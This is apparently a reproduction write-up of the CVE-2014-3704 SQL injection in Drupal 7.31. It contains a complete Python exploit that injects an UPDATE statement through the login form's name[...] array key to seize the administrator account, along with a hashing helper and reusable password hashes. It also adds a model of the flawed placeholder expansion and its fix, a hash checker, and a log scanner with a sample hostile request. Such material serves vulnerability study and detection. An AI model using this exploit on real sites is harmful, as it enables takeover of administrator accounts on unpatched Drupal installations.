This is not a very new vulnerability; what follows is a record of my own approach to reproducing it. Affected version:
Drupal 7.31
Drupal is an open source content management platform that provides support for millions of websites and applications.
It is built, used and supported by an active and diverse community around the world.
0x01 Vulnerability Reproduction
Reproduction environment:
1) Apache2.4
2) PHP 7.0
3) Drupal 7.31, download: https://www.drupal.org/drupal-7.31-release-notes
Unpack the packaged environment into the web directory and run the installer.
Problem encountered along the way:
Workaround: disable the extension=php_mbstring.dll line (back up the original before modifying it).
Exploit:
Original administrator account: root, password: rootxxxx
Exploit script (Python 2, uses urllib2):

import urllib2, sys
from drupalpass import DrupalHash   # drupalpass.py is listed below

if len(sys.argv) != 4:
    print "host username password"
    print "http://nope.io admin wowsecure"
    sys.exit(1)
host = sys.argv[1]
user = sys.argv[2]
password = sys.argv[3]

# Hash the chosen password with the setting of an existing $S$ hash. Only the first
# 12 characters (algorithm, cost character, 8-character salt) of this value are used.
hash = DrupalHash("$S$CTO9G7LX28RZCFPn4wb2hulkndkv6qtqhaf82wlbhpt2k5tzkzml", password).get_hash()
target = '%s/?q=node&destination=node' % host
# The array key of name[...] becomes part of a placeholder name in the database layer;
# the hash is truncated to 55 characters, which is what Drupal stores in users.pass.
post_data = "name[0%20;update+users+set+name%3d'" + user + "'+,+pass+%3d+'" + hash[:55] + "'+where+uid+%3d+'1';;#%20%20]=bob&name[0]=larry&pass=lol&form_build_id=&form_id=user_login_block&op=Log+in"
content = urllib2.urlopen(url=target, data=post_data).read()
if "mb_strlen() expects parameter 1" in content:
    print "Success!\nLogin now with user:%s and pass:%s" % (user, password)

drupalpass.py (imported by the script above):

import hashlib

# Calculate a non-truncated Drupal 7 compatible password hash.
# The consumer of these hashes must truncate correctly (Drupal stores 55 characters).

class DrupalHash:
    def __init__(self, stored_hash, password):
        self.itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
        self.last_hash = self.rehash(stored_hash, password)

    def get_hash(self):
        return self.last_hash

    def password_get_count_log2(self, setting):
        # The 4th character of the setting encodes log2 of the iteration count.
        return self.itoa64.index(setting[3])

    def password_crypt(self, algo, password, setting):
        # Only the first 12 characters (algorithm, count, 8-character salt) are used.
        setting = setting[0:12]
        if setting[0] != '$' or setting[2] != '$':
            return False
        count_log2 = self.password_get_count_log2(setting)
        salt = setting[4:12]
        if len(salt) < 8:
            return False
        count = 1 << count_log2
        if algo == 'md5':
            hash_func = hashlib.md5
        elif algo == 'sha512':
            hash_func = hashlib.sha512
        else:
            return False
        hash_str = hash_func(salt + password).digest()
        for c in range(count):
            hash_str = hash_func(hash_str + password).digest()
        output = setting + self.custom64(hash_str)
        return output

    def custom64(self, string, count=0):
        # Drupal's _password_base64_encode(): 3 bytes -> 4 symbols, low 6 bits first.
        if count == 0:
            count = len(string)
        output = ''
        i = 0
        itoa64 = self.itoa64
        while 1:
            value = ord(string[i])
            i += 1
            output += itoa64[value & 0x3f]
            if i < count:
                value |= ord(string[i]) << 8
            output += itoa64[(value >> 6) & 0x3f]
            if i >= count:
                break
            i += 1
            if i < count:
                value |= ord(string[i]) << 16
            output += itoa64[(value >> 12) & 0x3f]
            if i >= count:
                break
            i += 1
            output += itoa64[(value >> 18) & 0x3f]
            if i >= count:
                break
        return output

    def rehash(self, stored_hash, password):
        # Drupal 6 compatibility: a bare 32-character md5 hex digest.
        if len(stored_hash) == 32 and stored_hash.find('$') == -1:
            return hashlib.md5(password).hexdigest()
        # Drupal 7: 'U$' marks a migrated md5 hash that was re-hashed.
        if stored_hash[0:2] == 'U$':
            stored_hash = stored_hash[1:]
            password = hashlib.md5(password).hexdigest()
        hash_type = stored_hash[0:3]
        if hash_type == '$S$':
            hash_str = self.password_crypt('sha512', password, stored_hash)
        elif hash_type == '$H$' or hash_type == '$P$':
            hash_str = self.password_crypt('md5', password, stored_hash)
        else:
            hash_str = False
        return hash_str
I won't elaborate on it here.
http://127.0.0.1/drupal-7.31/node?destination=node
Clicking Log in here submits a POST whose form data alters the query statement: the injected UPDATE statement directly changes the administrator account's password.
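To see why a form key such as name[0 ; ...] ends up inside the SQL text, here is a small Python model of the placeholder expansion in Drupal 7's database layer (DatabaseConnection::expandArguments in includes/database/database.inc). It is an example added to this write-up, not the post's own code and not Drupal's code: the query string, the placeholder name and the injected subscript are constructed, and the "fixed" variant mirrors the 7.32 change of iterating over array_values() instead of the request-supplied keys.

```python
# Simplified Python model of Drupal 7's DatabaseConnection::expandArguments().
# Not Drupal's code: an illustration of how a placeholder bound to an array,
# e.g. ':name' => ['larry', 'bob'], is rewritten into ':name_0, :name_1'.
# Before 7.32 the suffix was taken from the array KEY, which for $_POST['name']
# is chosen by the client; 7.32 switched to array_values(), so only a sequential
# index can ever appear in the query text.

def expand_arguments_vulnerable(query, args):
    """Pre-7.32 behaviour: the suffix is the (client-controlled) array key."""
    for placeholder, value in list(args.items()):
        if not isinstance(value, dict):
            continue
        expanded = {}
        for key, item in value.items():
            expanded[placeholder + '_' + str(key)] = item   # key lands in the SQL verbatim
        query = query.replace(placeholder, ', '.join(expanded))
        del args[placeholder]
        args.update(expanded)
    return query, args


def expand_arguments_fixed(query, args):
    """7.32 behaviour: keys are dropped and a sequential index is used instead."""
    for placeholder, value in list(args.items()):
        if not isinstance(value, dict):
            continue
        expanded = {}
        for i, item in enumerate(value.values()):
            expanded[placeholder + '_' + str(i)] = item
        query = query.replace(placeholder, ', '.join(expanded))
        del args[placeholder]
        args.update(expanded)
    return query, args


# Constructed shape of the query the login block runs (not Drupal's exact SQL).
LOGIN_QUERY = "SELECT * FROM users WHERE name IN (:name) AND status = 1"


def expand_login_query(expander, post_name):
    """post_name mimics PHP's $_POST['name'] after form parsing: a dict whose keys
    are the bracketed subscripts and whose values are the submitted strings."""
    return expander(LOGIN_QUERY, {':name': dict(post_name)})


if __name__ == '__main__':
    # Constructed request body: name[0 ; SELECT 'injected' #]=bob&name[0]=larry
    hostile = {"0 ; SELECT 'injected' #": "bob", "0": "larry"}
    for expander in (expand_arguments_vulnerable, expand_arguments_fixed):
        sql, bound = expand_login_query(expander, hostile)
        print(expander.__name__)
        print("  SQL :", sql)
        print("  args:", bound)
```

With the vulnerable expander the subscript is spliced into the statement before any parameter binding happens, which is why the post's payload can close the IN clause with ; and comment out the rest with #. The fixed expander produces :name_0, :name_1 regardless of what the client put in the brackets, so the bound values are the only thing under attacker control.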
For the password hash, I called the official scripts/password-hash.sh to generate my own hash.
That produced an error here.
So I found two publicly posted hashes online to use in the UPDATE:
$S$DKIKDKLIVRK0IVHM99X7B/M8QC17E1TP/KMOD1IE8V/PGWJTAZLD ----> thanks
$S$CTO9G7LX2MJRSYWMLH3NRTXL6AWJT35FZEP9OBYJKWEZMHOGQF.S ---> [email protected]
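The hash format matters on the defender's side too: after an incident like this one, the question is whether the value now sitting in users.pass is the hash of some known password. Below is a Python 3 re-implementation of the Drupal 7 $S$ scheme (includes/password.inc: iterated SHA-512 over salt and password, phpass-style base64, truncation to 55 characters, and a user_check_password()-style comparison). It is an example added to this write-up, not the post's drupalpass.py and not Drupal's code; the setting $S$9saltsalt and the password example-password are constructed.

```python
import hashlib
import hmac

# Python 3 re-implementation of Drupal 7's $S$ password hashing and check
# (includes/password.inc). Not Drupal's code; written as an illustration.

ITOA64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
HASH_LENGTH = 55      # DRUPAL_HASH_LENGTH: users.pass keeps only the first 55 characters


def drupal_base64(data: bytes) -> str:
    """phpass-style base64: three bytes -> four symbols, least-significant 6 bits first."""
    out, i, n = [], 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3f])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3f])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3f])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3f])
    return ''.join(out)


def password_crypt(password: str, setting: str) -> str:
    """Full (98-character) $S$ hash. setting = '$S$' + cost symbol + 8-character salt;
    the cost symbol's position in ITOA64 is log2 of the number of SHA-512 rounds."""
    setting = setting[:12]
    if len(setting) < 12 or setting[:3] != '$S$' or setting[3] not in ITOA64:
        raise ValueError('not a Drupal 7 $S$ setting')
    rounds = 1 << ITOA64.index(setting[3])
    salt = setting[4:12].encode()
    pw = password.encode('utf-8')
    digest = hashlib.sha512(salt + pw).digest()
    for _ in range(rounds):
        digest = hashlib.sha512(digest + pw).digest()
    return setting + drupal_base64(digest)


def hash_for_storage(password: str, setting: str) -> str:
    """What Drupal writes to users.pass: user_hash_password() truncates to 55 characters."""
    return password_crypt(password, setting)[:HASH_LENGTH]


def check_password(password: str, stored: str) -> bool:
    """user_check_password(): re-derive with the stored setting, truncate, compare."""
    if not stored.startswith('$S$') or len(stored) != HASH_LENGTH:
        return False
    try:
        candidate = hash_for_storage(password, stored)
    except ValueError:
        return False
    return hmac.compare_digest(candidate, stored)


if __name__ == '__main__':
    # Constructed setting: cost symbol '9' (2**11 rounds) and salt 'saltsalt'.
    stored = hash_for_storage('example-password', '$S$9saltsalt')
    print(stored)
    print(check_password('example-password', stored), check_password('wrong', stored))
```

Because the salt and cost travel inside the stored value, any hash produced with a valid $S$ setting verifies against its own password; that is why the exploit above can reuse the first 12 characters of somebody else's hash. The truncation to 55 characters is the detail to get right when comparing values pulled from the database: the untruncated 98-character string never matches a stored hash.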
Payload:
Directly update the user: username owned, password [email protected]
From the database query results, or from MySQL monitoring, it can be seen that the administrator's username and password have been reset: the user owned now holds the administrator account, and its password is set to [email protected].
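Besides watching the users table, the attack leaves two traces a defender can key on: a form submission whose name[...] subscript contains SQL syntax, and the mb_strlen() warning the exploit itself uses as its success check. The scanner below is an example added to this write-up, not part of the original post. It assumes a request log that records POST bodies (for instance from a WAF or a reverse proxy configured to log bodies; a plain Apache access log does not contain the body) in the constructed form "<client> <method> <path> <body>", one request per line, plus a PHP/Apache error log; all sample lines are constructed.

```python
import re
from urllib.parse import unquote_plus

# Indicators for the user_login_block injection described in this post.
# Constructed example; log formats are assumptions, see the text above.

# Subscripts a legitimate Drupal form submits: numbers or plain identifiers.
SAFE_SUBSCRIPT = re.compile(r'^[A-Za-z0-9_-]*$')
SUBSCRIPTED_KEY = re.compile(r'^[^\[\]]+\[([^\]]*)\]')


def decode_keys(form_data):
    """URL-decoded keys of a form-encoded string. Hand-rolled instead of
    urllib.parse.parse_qs so that ';' inside a key is never treated as a separator."""
    keys = []
    for pair in form_data.split('&'):
        if pair:
            keys.append(unquote_plus(pair.split('=', 1)[0]))
    return keys


def suspicious_keys(form_data):
    """Keys whose array subscript carries characters (';', quotes, '#', spaces) that
    would have reached the placeholder expansion in Drupal < 7.32."""
    hits = []
    for key in decode_keys(form_data):
        m = SUBSCRIPTED_KEY.match(key)
        if m and not SAFE_SUBSCRIPT.match(m.group(1)):
            hits.append(key)
    return hits


def scan_request_log(text):
    """(client, path, suspicious keys) for every request whose query string or body
    carries a hostile array subscript."""
    alerts = []
    for line in text.splitlines():
        parts = line.split(' ', 3)
        if len(parts) < 4:
            continue
        client, _method, path, body = parts
        query = path.split('?', 1)[1] if '?' in path else ''
        hits = suspicious_keys(query) + suspicious_keys(body)
        if hits:
            alerts.append((client, path, hits))
    return alerts


# The exploit in this post decides success by this PHP warning appearing in the response;
# with log_errors enabled the same warning is written to the server's error log.
MB_STRLEN_WARNING = re.compile(r'mb_strlen\(\) expects parameter 1 to be string, array given')


def scan_php_log(text):
    return [line for line in text.splitlines() if MB_STRLEN_WARNING.search(line)]


# Constructed sample data (RFC 5737 documentation addresses, 'NNN' stands in for a line number).
REQUEST_LOG = """\
198.51.100.7 POST /drupal-7.31/?q=node&destination=node name=alice&pass=secret&form_id=user_login_block&op=Log+in
198.51.100.9 POST /drupal-7.31/?q=node&destination=node name[0%20;select+1;%23]=bob&name[0]=larry&pass=lol&form_build_id=&form_id=user_login_block&op=Log+in
203.0.113.5 GET /drupal-7.31/?q=node/1 -
"""
PHP_LOG = """\
[Thu Jan 01 10:00:01 2015] [error] [client 198.51.100.9] PHP Warning:  mb_strlen() expects parameter 1 to be string, array given in /var/www/html/includes/unicode.inc on line NNN
[Thu Jan 01 10:00:02 2015] [error] [client 198.51.100.7] PHP Notice:  Undefined index: foo in /var/www/html/sites/all/modules/example/example.module on line NNN
"""

if __name__ == '__main__':
    for client, path, keys in scan_request_log(REQUEST_LOG):
        print("suspicious form key from %s to %s: %s" % (client, path, keys))
    for line in scan_php_log(PHP_LOG):
        print("error-log indicator:", line)
```

The key check is deliberately generic: it flags any bracketed subscript that is not a number or identifier, so it also catches variations that do not use the exact name[0 ;...] shape from the post, while ordinary Drupal forms (roles[administrator], field_x[und][0][value]) pass. The mb_strlen() warning on its own is weaker evidence, since any array reaching drupal_strlen() produces it, so correlate it with the request that triggered it.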
Ref
- http://0day5.com/archives/2310/
- http://www.freebuf.com/vuls/47690.html
[CVE-2014-3704] Drupal 7.31 SQL Injection Vulnerability Analysis and Reproduction